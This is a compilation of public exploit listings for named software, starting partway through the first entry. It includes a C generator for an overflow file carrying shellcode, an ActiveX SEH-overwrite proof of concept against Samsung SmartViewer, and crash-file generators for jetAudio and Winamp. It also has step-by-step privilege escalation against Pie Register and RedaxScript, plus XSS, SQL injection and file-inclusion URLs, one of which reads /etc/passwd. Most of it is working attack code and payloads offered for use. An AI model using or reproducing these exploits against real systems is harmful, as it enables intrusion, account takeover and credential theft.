                "[~] Author: Osanda Malith Jayathissa\n"
                "[~] E-Mail: osanda[cat]unseen.is\n"
                "[~] Website: OsandaMalith.wordpress.com\n\n";

    fwrite(banner, sizeof(char), sizeof(banner) , stdout);
}

void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
    size_t pattern_len = strlen(pattern);
    count *= pattern_len;
    if (count > dst_size) count = dst_size;
    if (pattern_len > dst_size) pattern_len = dst_size;

    size_t i, pI;
    for (i = 0, pI = 0; i < count ; i++, pI++) {
        if (pI == pattern_len) pI = 0;
        dst[i] = pattern[pI];
    }
}

int main() {
    banner();
    int shell_type = menu();
    if (shell_type >= SHELLS_COUNT) {
        printf("[-] Enter a valid input\n");
        exit (1);
    }

    char *buff = (char*) calloc (SIZE, sizeof(char));
    char *nops = (char*) calloc (SIZE, sizeof(char));
    if (!buff || !nops) exit (1);

    patternfill(buff, "41", 405, SIZE);
    patternfill(nops, "90", 16, SIZE);

    char ret[] = "B3804200";
    const char* filename = "exploit.sms";

    FILE *outfile = fopen(filename, "w");
    if (!outfile) {
        printf("%s\n","Could not open file");
        exit (1);
    }

    fputs(buff,   outfile);
    fputs(ret,    outfile);
    fputs(nops,   outfile);

    fputs(shells[shell_type],  outfile);
    printf("%s", shell_info[shell_type]);
    fclose(outfile);
    free(buff);
    printf("[+] Successfully to written to: \"%s\"\n", filename); 
    return 0;
}
/*EOF*/
HireHackking 
<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC 
PoC developed by Praveen Darshanam 

For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->

<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
 var payload_length = 15000;
 var arg1=1;
 var arg2=1;
 var arg3=1;
 //blank strings
 var junk = "";
 var buf1 = "";
 var buf2 = "";

 //offset to SE is 156, initial analysis using metasploit cyclic pattern
 for (i=0; i<156; i++)
 {
  buf1 += "A";
 }
 var nseh = "DD";
 var seh = "\x87\x10";	//from Vulnerable DLL
 junk = buf1 + nseh + seh;

 //remaining buffer
 for (j=0; j<(payload_length-junk.length); j++)
 {
  buf2 += "B";
 }
 //final malicious buffer
 var fbuff = junk + buf2;
 target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);

</script>
</html>
HireHackking 
# Exploit Title: Pie Register 2.0.13 Privilege escalation
# Date: 16-10-2014
# Software Link: https://wordpress.org/plugins/pie-register/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-8802
# Category: webapps

1. Description
  
Anyone can import CSV file. Pie Register will import users from this file.

File: pie-register\pie-register.php

add_action( 'init', array($this,'pie_main') );
function pie_main() {
	// I skip unnecessary lines
	if(isset($_FILES['csvfile']['name'])) {
		$this->importUsers();
	}
}

http://security.szurek.pl/pie-register-2013-privilege-escalation.html

2. Proof of Concept

Create CSV file based on given example:

"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"
"hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"

Import account using:

<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">
    Input CSV<input type="file" name="csvfile">
    <input type="submit" value="Add user!">
</form>

Create another standard account using wp-login.php?action=register.

After login go to wp-admin/profile.php and search "uid" in page source.

Number after "uid" is our current account id. For example: "uid":"123".

We can assume that previously imported admin account has id-1 (or id-x where x is natural number).

We can activate this account using:

<form method="post" action="http://wordpress-instalation">
    <input type="hidden" name="verifyit" value="1">
    Account id:<input type="text" name="vusers[]" value="">
    <input type="submit" value="Activate user!">
</form>

Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword
  
3. Solution:
  
Update to version 2.0.14
https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip
HireHackking 
source: https://www.securityfocus.com/bid/48106/info

vBulletin vBExperience is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vBulletin vBExperience 3.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script>
HireHackking 
source: https://www.securityfocus.com/bid/48108/info

http://www.noticeboardpro.com/notice-board-pro-copyright.htmlJoomla CCBoard is prone to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2
HireHackking 
# Exploit Title     	: jetAudio 8.1.3 Basic Use-after-free (Corrupted mp4) Crash POC
# Product				: jetAudio Basic
# Date              	: 12.12.2014
# Exploit Author    	: ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link     	: http://www.jetaudio.com/download/
# Vulnerable version	: 8.1.3 (Latest at the moment) and probably previous versions
# Vendor Homepage   	: http://www.jetaudio.com/
# Tested on         	: jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
# CVE 					: unknown at the moment
#============================================================================================
# Open created POC file (fault.mp4) with jetAudio
# Details
# 	(6e74.6e20): Access violation - code c0000005 (first chance)
#  First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
#JFDSPL!JPluginCreate+0x338f8:
#0a1a7588 8b11            mov     edx,dword ptr [ecx]  ds:002b:050aacf8=????????
#0:000:x86> kb
#ChildEBP RetAddr  Args to Child              
#WARNING: Stack unwind information not available. Following frames may be wrong.
#0018feec 72512466 00000000 00000000 00000000 JFDSPL!JPluginCreate+0x338f8
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for JetAudio.exe - 
#0018ff00 005961ba 00000000 f9b7337c 00000000 MSVCR90!exit+0x11
#0018ff88 7558338a 7efde000 0018ffd4 771e9f72 JetAudio!CxIOFile::~CxIOFile+0x19414a
#0018ff94 771e9f72 7efde000 765bba31 00000000 kernel32!BaseThreadInitThunk+0xe
#0018ffd4 771e9f45 00596315 7efde000 00000000 ntdll32!__RtlUserThreadStart+0x70
#0018ffec 00000000 00596315 7efde000 00000000 ntdll32!_RtlUserThreadStart+0x1b
#0:000:x86> u 0a1a7588 
#JFDSPL!JPluginCreate+0x338f8:
#0a1a7588 8b11            mov     edx,dword ptr [ecx]
#0a1a758a 8b420c          mov     eax,dword ptr [edx+0Ch]
#0a1a758d 6a01            push    1
#0a1a758f 6870ff1d0a      push    offset JFDSPL!CxIOFile::~CxIOFile+0x303e0 (0a1dff70)
#0a1a7594 ffd0            call    eax
#0a1a7596 6aff            push    0FFFFFFFFh
#0a1a7598 6a00            push    0
#0a1a759a 8d8e043d0000    lea     ecx,[esi+3D04h]
#============================================================================================
#!/usr/bin/python
  
pocdata=("\x00\x00\x00\xFA\x66\x74\x79\x70\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x00\x00\x00\x00\x6D\x70\x34\x32\x69\x73\x6F\x6D\x61\x76\x63\x31\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x34\x32\x6D\x70\x6D\x70\x34\x32\x00\x00")
  
mp4file = "fault.mp4"
file = open(mp4file,"w")
file.write(pocdata)
file.close()
HireHackking 
# Exploit Title     	:  Winamp 5.666 build 3516 'f263.w5s' (Corrupted flv) Crash POC
# Product				:  Winamp  5.666 build 3516
# Date              	:  12.12.2014
# Exploit Author    	:  ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link     	:  http://winampplugins.co.uk/Winamp/
# Vulnerable version	:  Winamp  5.666 build 3516 (Latest at the moment) and probably previous versions
# Vendor Homepage   	:  http://www.winamp.com/
# Tested on         	:  Winamp  5.666 build 3516 installed on Windows 7 x64
# CVE 					:  unknown at the moment
#============================================================================================
# Open created POC file (fault.flv) with Winamp
# Details

#(7714.ac58): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#f263!GetWinamp5SystemComponent+0x1951:
#08572f15 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:e54d18b6=??
#0:021:x86> u eip
#f263!GetWinamp5SystemComponent+0x1951:
#08572f15 0fb601          movzx   eax,byte ptr [ecx]
#08572f18 0fb67901        movzx   edi,byte ptr [ecx+1]
#08572f1c c1e008          shl     eax,8
#08572f1f 0bc7            or      eax,edi
#08572f21 0fb67902        movzx   edi,byte ptr [ecx+2]
#08572f25 0fb64903        movzx   ecx,byte ptr [ecx+3]
#08572f29 c1e008          shl     eax,8
#08572f2c 0bc7            or      eax,edi


#!/usr/bin/python
  
flvheader=("\x46\x4C\x56\x01\xC5\x00\x00\x00\x09\x00\x00\x00\x00")
flvscripdatatag1 = ("\x12\x00\x02\x76\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08\x00\x00\x00\x1C\x00\x0B\x68\x61\x73\x4D\x65\x74\x61\x64\x61\x74\x61\x01\x01\x00\x08\x68\x61\x73\x56\x69\x64\x65\x6F\x01\x01\x00\x08\x68\x61\x73\x41\x75\x64\x69\x6F\x01\x01\x00\x08\x64\x75\x72\x61\x74\x69\x6F\x6E\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0D\x6C\x61\x73\x74\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x15\x6C\x61\x73\x74\x6B\x65\x79\x66\x72\x61\x6D\x65\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x77\x69\x64\x74\x68\x00\x40\x89\x00\x00\x00\x00\x00\x00\x00\x06\x68\x65\x69\x67\x68\x74\x00\x40\x82\xC0\x00\x00\x00\x00\x00\x00\x0D\x76\x69\x64\x65\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\xBA\x2F\x4B\x7A\x6F\x4D\xEA\x00\x09\x66\x72\x61\x6D\x65\x72\x61\x74\x65\x00\x40\x35\xBD\x37\xA6\xF4\xDE\x9C\x00\x0D\x61\x75\x64\x69\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\x55\xDD\xD3\x7A\x6F\x4D\xEA\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x72\x61\x74\x65\x00\x40\xD5\x88\x80\x00\x00\x00\x00\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x73\x69\x7A\x65\x00\x40\x30\x00\x00\x00\x00\x00\x00\x00\x06\x73\x74\x65\x72\x65\x6F\x01\x00\x00\x08\x66\x69\x6C\x65\x73\x69\x7A\x65\x00\x40\xE3\xE1\x00\x00\x00\x00\x00\x00\x09\x76\x69\x64\x65\x6F\x73\x69\x7A\x65\x00\x40\xE3\x47\x20\x00\x00\x00\x00\x00\x09\x61\x75\x64\x69\x6F\x73\x69\x7A\x65\x00\x40\x80\x78\x00\x00\x00\x00\x00\x00\x08\x64\x61\x74\x61\x73\x69\x7A\x65\x00\x40\x85\x18\x00\x00\x00\x00\x00\x00\x0F\x6D\x65\x74\x61\x64\x61\x74\x61\x63\x72\x65\x61\x74\x6F\x72\x02\x00\x0D\x66\x6C\x76\x6D\x65\x74\x61\x20\x31\x2E\x31\x2E\x32\x00\x0C\x6D\x65\x74\x61\x64\x61\x74\x61\x64\x61\x74\x65\x0B\x42\x74\xAF\x38\x0D\x3D\x00\x00\x00\x00\x00\x0C\x61\x75\x64\x69\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x3F\xF0\x00\x00\x00\x00\x00\x00\x00\x0C\x76\x69\x64\x65\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x61\x75\x64\x69\x6F\x64\x65\x6C\x61\x79\x00\x3F\xA7\x8D\x4F\xDF\x3B\x64\x5A\x00\x0C\x63\x61\x6E\x53\x65\x65\x6B\x54\x6F\x45\x6E\x64\x01\x01\x00\x0C\x68\x61\x73\x43\x75\x65\x50\x6F\x69\x6E\x74\x73\x01\x00\x00\x09\x63\x75\x65\x50\x6F\x69\x6E\x74\x73\x0A\x00\x00\x00\x00\x00\x0C\x68\x61\x73\x4B\x65\x79\x66\x72\x61\x6D\x65\x73\x01\x01\x00\x09\x6B\x65\x79\x66\x72\x61\x6D\x65\x73\x03\x00\x05\x74\x69\x6D\x65\x73\x0A\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x66\x69\x6C\x65\x70\x6F\x73\x69\x74\x69\x6F\x6E\x73\x0A\x00\x00\x00\x01\x00\x40\x85\xC0\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x09\x00\x00\x02\x81")

flvscripdatatag2 = ("\x12\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0C\x6F\x6E\x4C\x61\x73\x74\x53\x65\x63\x6F\x6E\x64\x08\x00\x00\x00\x00\x00\x00")
flvvideotag = ("\x09\x00\x00\x00\x22\x09\x00\x00\x9E\x00\x00\x00\x00\x00\x00\x00\x12\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x9A\x39")
flvaudiotag = ("\x08\x00\x02\x04\x00\x00\x2E\x00\x00\x00\x00\x1A\xBF\xB7\x12\x40\x01\x00\x30\xC2\x3B\x32\x00\xBA\xFD\x6A\x92\x88\x8C\x03\xA9\x38\x02\x89\xA9\x0B\xBD\xE8\x8C\x80\x23\x04\x2C\xE8\xBB\x30\x99\xA3\x2F\xA8\x02\x28\x11\xC2\x8F\x89\xA7\x19\x28\xB0\x99\x40\x40\xB8\x8F\xC1\x02\x41\x12\x08\xC8\x12\x70\x80\x88\x18\xA4\x61\x12\x08\x29\x11\xC2\x21\x3A\x80\x17\x33\x3B\x1A\xF8\x08\x80\x74\x80\x89\x80\xBA\x48\x96\x0B\xA8\x92\x32\x12\x70\x89\xA0\x8A\x25\x28\x82\x98\x3F\xB0\x01\x08\x89\x2E\x90\x90\x01\xBA\x79\xB9\x99\x47\x19\x01\x09\x9B\xBD\xA7\x20\x8A\x9B\x84\x98\x4A\xB4\x1D\xA9\x02\x50\x14\x1C\x81\x90\x29\x02\xAA\xD9\x9C\x12\xD8\x10\x1A\x37\x9A\x20\xDB\xB8\x1C\x13\x86\x28\x89\x13\x09\x9D\xB0\x01\x2A\xD8\xA2\x5C\xB9\x82\xCE\x12\x36\x0A\x99\x01\x82\x08\x02\x61\x93\x71\x08\xBB\x11\x10\x33\x27\x32\x19\x08\xA2\x11\x8F\x06\x99\x18\x81\xDB\x89\x0B\x93\x00\x19\x09\xF2\x3C\xA8\xD8\x08\x18\x17\x8B\x80\x9A\x3C\xF8\x00\x99\xBF\xA0\x08\x91\x8A\x29\x98\xF9\x40\xC9\x0C\x81\xBC\x90\x19\xA2\x59\xC8\x9A\x18\xE0\x08\x0C\xB2\x1B\x37\x00\x0B\x90\x01\x00\x41\xB8\x79\xB2\x9C\x53\x10\x8B\x50\x92\x39\xA0\x98\x73\x42\x43\xAA\x40\x81\x9A\x34\xA8\x53\x87\x48\xA9\xA8\x8A\x96\x10\x23\x19\x94\x00\x43\x88\x3B\x17\x00\x34\x00\x42\x8B\xC0\x10\x01\x89\x65\x89\x30\x24\xA0\x2F\xB2\x89\x88\x8B\xA4\x1C\x81\x93\x49\x99\xCC\xA0\xB8\x8F\xBA\xC2\x2C\x34\x92\x2D\xA2\x0A\x40\x91\x28\xAF\xC8\x03\x18\x29\xFB\x8A\x98\x22\x85\x2C\xAB\xB8\x89\x8C\xA1\x13\xA8\x4D\x87\x8C\x08\x93\x8A\x31\xC9\x19\x26\x88\x29\x22\xEA\x90\x72\x02\x99\x2A\xA1\x92\x79\x04\xAC\x21\x85\x8A\x20\x00\xA2\x11\x09\x44\xBD\xA8\x88\x1A\xB0\x8C\x91\x13\x29\xDB\x8B\xF8\xA9\x40\x61\xF9\x00\x99\x98\x00\x8C\xD8\x20\xB8\x0A\x11\xFC\x0A\xC9\x88\x09\x93\x3A\x01\x9A\xEA\xC0\x0F\x10\x02\x99\x3C\xC0\x9B\x38\xB7\x0B\x99\x99\xF8\x43\x09\x80\x99\x92\x22\x45\x19\x89\xDB\x02\x28\x10\xD0\x20\x12\xB1\xBD\x05\x10\x79\x05\x89\x10\x81\x0C\xB2\x80\x61\x98\x08\x30\xB6\x19\x44\x98\x3A\x98\x82\x18\x76\x09\x10\x91\xCC\x22\xA1\x3A\x09\x92\x9A\x49\xDB\xC8\x31\x12\xC1\x0D\x0A\x83\x01\x70\xA6\x8B\x3A\xA3\x9B\x40\x92\x80\x59\xB2\xAC\x8E\x91\xB9\x10\x20\xBF\x80\xA0\x93\x2C\x0B\x86\x0C\xB1\x41\x84\xA0\x00\x00\x02\x0F")
pocdata = [flvheader,flvscripdatatag1,flvscripdatatag2,flvvideotag,flvaudiotag]
flvfile = "fault.flv"
file = open(flvfile,"wb")
file.write(''.join(pocdata))
file.close()
HireHackking 
source: https://www.securityfocus.com/bid/48109/info

Nakid CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Nakid CMS 1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);//
HireHackking 
source: https://www.securityfocus.com/bid/48110/info

Multiple WordPress WooThemes (Live Wire) are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/48113/info

PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 

http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON
HireHackking 
source: https://www.securityfocus.com/bid/48118/info

Squiz Matrix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Squiz Matrix 4.0.6 and 4.2.2 are vulnerable; other versions may also be affected. 

http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000
HireHackking 
source: https://www.securityfocus.com/bid/48126/info

Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected. 

http://www.example.com/index.php?-action=../../../../../../etc/passwd%00
HireHackking 
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Date: 11-05-2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://redaxscript.com/
# Version: 2.1.0
# Tested on: Windows 8

#Privilege Escalation in RedaxScript 2.1.0


 RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The
issue occurs because the application fails to properly implement access
controls. The application also fails to perform proper sanity checks on the
user supplied input before processing it.  These two flaws led to a
vertical privilege escalation. This can be achieved by a simply tampering
the parameter values. An attacker can exploit this issue to gain elevated
privileges to the application.

*Steps to reproduce the instance:*

·         login as a non admin user

·         Go to account and update the account.

·         intercept the request and add “*groups[]=1*” to the post data and
submit the request

·         Log out of the application and log in again. You can now browse
the application with admin privileges.

This vulnerability was addressed in the following commit.

https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified


*Timeline*:

09-26-2014:         Issue identified

09-27-2014:         Discussion with the vendor

10-27-2014:         Issue confirmed

11-05-2014:         Patch released.




Author:                                Shyamkumar Somana
Vendor Homepage:        http://redaxscript.com/download
Version:                               2.1.0
Tested on:                          Windows 7

-- 

  [image: --]
shyam kumar
[image: http://]about.me/shyamkumar.somana
     <http://about.me/shyamkumar.somana?promo=email_sig>

Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
in.linkedin.com/in/sshyamkumar/ |